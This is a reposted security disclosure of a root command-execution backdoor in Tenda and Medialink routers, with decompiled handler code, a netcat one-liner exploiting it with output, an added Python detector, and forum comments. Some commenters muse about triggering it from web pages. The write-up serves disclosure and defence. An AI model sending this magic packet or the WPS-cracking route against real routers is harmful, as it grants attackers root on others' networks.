Disclosed by the same site; it takes just a single UDP packet. Link:

http://www.devttys0.com/2013/10/from-china-with-love/

Routers mentioned in the blog post: Tenda W302R, Tenda W330R, Medialink MWN-WAPR150N.


From China, With Love!

Lest anyone think that D-Link is the only vendor who puts backdoors in their products, here’s one that can be exploited with a single UDP packet, courtesy of Tenda.

After extracting the latest firmware for Tenda’s W302R wireless router, I started looking at /bin/httpd, which turned out to be the GoAhead webserver:

[Figure: Server header string in /bin/httpd]

But Tenda has made a lot of special modifications themselves. Just before entering the HTTP receive loop, main calls InitMfgTask, which spawns the MfgThread function as a separate thread:

[Figure: InitMfgTask calling pthread_create(&var_10, 0, MfgThread, 0);]

Hmmm…InitMfgTask and MfgThread? Related to manufacturing tasks perhaps? Iiiiiinteresting…

The first thing MfgThread does is create a UDP socket and bind it to port 7329:

[Figure: Create UDP socket and bind to port 7329]

The thread then goes into a recvfrom loop, reading up to 128 bytes from the socket. It expects each received UDP packet to be at least 14 bytes in length:

[Figure: Read packet from socket and check packet size]

Now for the fun part; the received UDP packet is then parsed by this block of code:

[Figure: Processing the received packet]

In C, this code reads:

// Zero the three 128-byte working buffers
memset(rx_magic_string, 0, 0x80);
memset(command_byte, 0, 0x80);
memset(command_arg, 0, 0x80);

// Split the received datagram into magic string, command byte and argument
memcpy(rx_magic_string, rx_buf, 9);
command_byte[0] = rx_buf[11];
memcpy(command_arg, rx_buf+12, rx_size-12);

// If magic string doesn't match, stop processing this packet and wait for another packet
if(strcmp(rx_magic_string, "w302r_mfg") != 0) goto outer_receive_loop;

We can see that the thread is expecting a packet with the following structure:

struct command_packet_t
{
    char magic[10]; // 9 byte magic string ("w302r_mfg"), plus a NULL terminating byte
    char command_byte;
    char command_arg[117];
};

As long as the received packet starts with the string “w302r_mfg”, the code then compares the specified command byte against three ASCII characters (‘1’, ‘x’ and ‘e’):

[Figure: Comparing command_byte to ‘1’, ‘x’ and ‘e’]

For simplicity, I’ve converted the remaining disassembly (at least the important bits) to the following C code:

switch(command_byte)
{
    case 'e':
        // Ping: echo the magic string back to the client
        strcpy(tx_buf, "w302r_mfg");
        tx_size = 9;
        break;
    case '1':
        // Nominally for iwpriv commands, but the check is only a substring match
        if(strstr(command_arg, "iwpriv") != NULL)
        {
            tx_size = call_shell(command_arg, tx_buf, 0x800);
        }
        else
        {
            strcpy(tx_buf, "000000");
            tx_size = strlen(tx_buf);
        }
        break;
    case 'x':
        // Unrestricted: run the argument as a shell command (as root) and return its output
        tx_size = call_shell(command_arg, tx_buf, 0x800);
        break;
    default:
        goto outer_receive_loop;
}

// Reply to whoever sent the packet, then wait for the next one
sendto(client_socket, tx_buf, tx_size, 0, (struct sockaddr *)&client_sock_addr, 16);
goto outer_receive_loop;

The following actions correspond to the three accepted command bytes:

  • ‘e’ – Responds with a pre-defined string, basically a ping test
  • ‘1’ – Intended to allow you to run iwpriv commands
  • ‘x’ – Allows you to run any command, as root

If ‘x’ is specified as the command byte, the remainder of the packet after the command byte (called command_arg in the above code) is passed to call_shell, which executes the command via popen:

[Figure: call_shell invoking popen(command_arg, "r");]

What’s more, call_shell populates the tx_buf buffer with the output from the command, which, as we can see from the previous C code, is sent back to the client!
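As an added example (not code from the original post or from the Tenda firmware), here is a small Python parser that applies the firmware's own checks to a UDP/7329 payload and classifies the command byte, the kind of logic a network sensor or honeypot would use to flag this traffic. Field offsets follow the struct and the netcat packet shown in the post (command byte at offset 10, argument from offset 11); the sample datagrams, severity labels and alert format are constructed.

```python
from typing import Optional
MAGIC = b"w302r_mfg"    # magic string checked by MfgThread
MFG_PORT = 7329         # UDP port the thread binds to
MIN_PACKET_LEN = 14     # shorter datagrams are discarded by the firmware
MAX_PACKET_LEN = 128    # recvfrom reads at most 128 bytes

# Constructed severity labels, one per accepted command byte
SEVERITY = {
    "e": "low: probe, firmware replies with the magic string",
    "1": "high: argument runs via popen when it contains 'iwpriv'",
    "x": "critical: arbitrary command runs as root via popen",
}

def parse_mfg_packet(payload: bytes) -> Optional[dict]:
    """Apply the firmware's checks; return None for packets it would drop."""
    if len(payload) < MIN_PACKET_LEN:
        return None                       # fails the size check
    payload = payload[:MAX_PACKET_LEN]    # recvfrom truncation
    if payload[:len(MAGIC)] != MAGIC:
        return None                       # strcmp against the magic fails
    cmd = chr(payload[10])                # command byte (struct layout)
    if cmd not in SEVERITY:
        return None                       # default: branch, packet dropped
    arg = payload[11:].split(b"\x00", 1)[0].decode("latin-1")
    reaches_shell = cmd == "x" or (cmd == "1" and "iwpriv" in arg)
    return {"command": cmd, "arg": arg, "reaches_shell": reaches_shell,
            "severity": SEVERITY[cmd]}

def alert_line(src: str, dst: str, dport: int, payload: bytes) -> Optional[str]:
    """One alert per matching datagram; None when there is nothing to flag."""
    if dport != MFG_PORT:
        return None
    info = parse_mfg_packet(payload)
    if info is None:
        return None
    return (f"TENDA_MFG_BACKDOOR src={src} dst={dst} cmd={info['command']!r} "
            f"shell={info['reaches_shell']} arg={info['arg']!r}")

# Constructed sample datagrams; the first is the exact payload from the post
SAMPLES = [
    ("192.168.0.50", "192.168.0.1", 7329, b"w302r_mfg\x00x/bin/ls"),
    ("192.168.0.50", "192.168.0.1", 7329, b"w302r_mfg\x00e\x00\x00\x00\x00"),
    ("192.168.0.50", "192.168.0.1", 7329, b"w302r_mfg\x001iwpriv ra0 stat"),
    ("192.168.0.50", "192.168.0.1", 7329, b"short"),
    ("192.168.0.50", "192.168.0.1", 53, b"w302r_mfg\x00x/bin/ls"),
]

if __name__ == "__main__":
    for src, dst, dport, data in SAMPLES:
        print(alert_line(src, dst, dport, data) or f"ignored: {data!r}")
```

Feeding real UDP/7329 payloads from a capture through alert_line gives one line per packet that the firmware would actually act on, so a LAN-side sensor can tell a probe (‘e’) from a command execution (‘x’).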

Knowing the functionality of MfgThread and its expected packet structure, we can easily exercise this backdoor with netcat:

$ echo -ne "w302r_mfg\x00x/bin/ls" | nc -u -q 5 192.168.0.1 7329
drwxr-xr-x    2 0        0            1363 webroot
drwxr-xr-x    1 0        0               0 var
drwxr-xr-x    5 0        0              43 usr
drwxr-xr-x    1 0        0               0 tmp
drwxr-xr-x    2 0        0               3 sys
drwxr-xr-x    2 0        0             569 sbin
dr-xr-xr-x   39 0        0               0 proc
drwxr-xr-x    2 0        0               3 mnt
drwxr-xr-x    1 0        0               0 media
drwxr-xr-x    4 0        0             821 lib
lrwxrwxrwx    1 0        0              11 init -> bin/busybox
drwxr-xr-x    2 0        0               3 home
drwxr-xr-x    7 0        0             154 etc_ro
drwxr-xr-x    1 0        0               0 etc
drwxr-xr-x    1 0        0               0 dev
drwxr-xr-x    2 1000     100           574 bin

One teensy-weensy, but ever so crucial little tiny detail is that the backdoor only listens on the LAN, thus it is not exploitable from the WAN. However, it is exploitable over the wireless network, which has WPS enabled by default with no brute force rate limiting. My shiny new ReaverPro box made relatively short work of cracking WPS, providing access to the WLAN and a subsequent root shell on the router (they also ship with a default WPA key, which you might want to try first):

[Figure: ReaverPro cracking the WPS pin]

[Figure: Starting telnetd and getting a root shell]

As the magic string suggests, this backdoor was likely first implemented in Tenda’s W302R router, although it also exists in the Tenda W330R, as well as re-branded models, such as the Medialink MWN-WAPR150N. They all use the same “w302r_mfg” magic packet string.

UPDATE:

ea did a great job of grepping through various Tenda firmwares to find a lot more routers that are likely affected: http://ea.github.io/blog/2013/10/18/tenda-backdoor/

[Original article]

Discussion on the original post:

virusdefender says:

October 18, 2013 at 2:35 am

it’s mysterious…

monky says:

October 18, 2013 at 2:45 am

Chinese device has backdoor in router. wow… amazing!!!!

Pingback: Tenda router backdoor? | USA is China

cong ty luat says:

October 18, 2013 at 6:16 am

from china with love. :V

Preston says:

October 18, 2013 at 6:31 am

Some how, the source of this GoAhead was on github:

https://github.com/socoola/yhrouter/blob/master/user/goahead/src/goahead.c

GitHub's record shows the repo was committed to GitHub a year ago. It shows very clearly how the backdoor “MfgThread” works.

I’ve no idea where the source comes from, maybe leaked from an engineer? I guess Tenda doesn’t intend to open-source their firmware.

Craig says:

October 18, 2013 at 12:20 pm

Yeah, I saw that too (after I RE’d the firmware of course). It’s common for vendors to not release the source to any of their custom/customized binaries, even if they have a GPL release; it isn’t clear why the code got uploaded to GitHub though.

Jobs says:

October 18, 2013 at 7:28 am

WHAT THE CHINESE ROUTERS !!!

I’m using f*** tenda wireless accesspoint…

Craig says:

October 18, 2013 at 12:21 pm

Well the good news is that the backdoor only listens on the LAN, so as long as you don’t have any untrusted users on your network and you disable WPS and use a strong WPA passphrase, you should be relatively safe.

Chinese Guy says:

October 18, 2013 at 7:40 pm

Are you telling me they will go near your house, check if your WPS is on, and sit there for several hours to crack the password just to spy on your unencrypted connections? Scaring your ISP to hand over your data is definitely more effective. This kind of obvious backdoor is more like the work of a newbie programmer who is cheap to hire, and wanted to test the firmware but forgot to remove it when releasing the firmware.

Craig says:

October 18, 2013 at 7:59 pm

I doubt this was a forgotten backdoor (though almost certainly the developers of these devices are newbies/cheap hires). Based on the function names alone this appears to be put in place intentionally for testing/debugging during manufacturing.

ea says:

October 18, 2013 at 8:34 am

Nice find, I grepped through the different firmwares on Tenda's website: http://ea.github.io/blog/2013/10/18/tenda-backdoor/

Craig says:

October 18, 2013 at 12:18 pm

Awesome work! I updated the post to include this link.

Veronique says:

October 18, 2013 at 9:18 am

F** China device !

Pingback: Another backdoor in routers: a magic UDP packet is enough | Zaufana Trzecia Strona

Benny says:

October 18, 2013 at 10:58 am

Great work, congratulations to your success!

Pingback: NeoAtlantis/NERV | [Repost] Tenda router backdoor gives root access

Jack says:

October 19, 2013 at 5:31 am

Well, we should boycott Chinese devices immediately!

Comments:

1#

灬相随灬 (Be bold and the whole world is open to you; be timid and you can't move an inch.) | 2013-10-18 09:37

0.0

2#

纷纭 | 2013-10-18 09:57

This is the one I have at home.

3#

xsser (ten cocks come in different lengths!!) | 2013-10-18 10:11

4#

请叫我大神 | 2013-10-18 10:11

Which IP is 7329 listening on?

5#

xsjswt | 2013-10-18 10:12

@xsser nice

6#

wefgod (looking for a guru's guidance) | 2013-10-18 10:16

@xsser damn

7#

xsjswt | 2013-10-18 10:19

@xsjswt Judging by the analysis and the test run, it's bound to the LAN IP.

8#

xsjswt | 2013-10-18 10:20

@请叫我大神 Judging by the analysis and the test run, it's bound to the LAN IP.

9#

蟋蟀哥哥 (popok is a little punk!![just for fun]) | 2013-10-18 10:25

Damn, that's awesome.

10#

clozure | 2013-10-18 10:30

Badass.

11#

请叫我大神 | 2013-10-18 10:34

@xsjswt As I recall this isn't Tenda's first time; that WPS PIN issue last time seemed to involve them too.

12#

xsjswt | 2013-10-18 11:11

@请叫我大神 Take me along and let's get rich.

13#

xsjswt | 2013-10-18 11:11

@clozure tcpper is on fire.

14#

Ivan | 2013-10-18 13:26

I'll go home and mess with it.

15#

xsser (ten cocks come in different lengths!!) | 2013-10-18 13:30

How could you launch the attack directly from a web page?

16#

xsjswt | 2013-10-18 16:08

@xsser I thought about it for a long time today; in the end only Java would do.

17#

xsjswt | 2013-10-18 16:08

@xsser I hear the next generation of Flash will support UDP.

18#

cnrstar (Be My Personal Best!) | 2013-10-18 16:11

@xsjswt Awesome!

19#

暴暴 | 2013-10-18 16:14

Badass, but what was the vendor's purpose in leaving this in? What do they gain from it?

20#

Hxai11 (http://www.itkuo.cn) | 2013-10-18 16:40

Seriously badass. The vendor left this in?

21#

ppt (http://t.cn/7V3QH#duan_wang_zhi_ni_ye_gan_dian?|nuf rof gnikcah|) | 2013-10-18 19:52

@xsjswt @xsser I hear Chrome apps can send UDP packets; link: http://developer.chrome.com/apps/app_network.html#udp

22#

xsser (ten cocks come in different lengths!!) | 2013-10-18 20:49

@ppt But you can't get ordinary users to install an app.

23#

also (white hat) | 2013-10-18 22:02

@请叫我大神 It's the router's IP.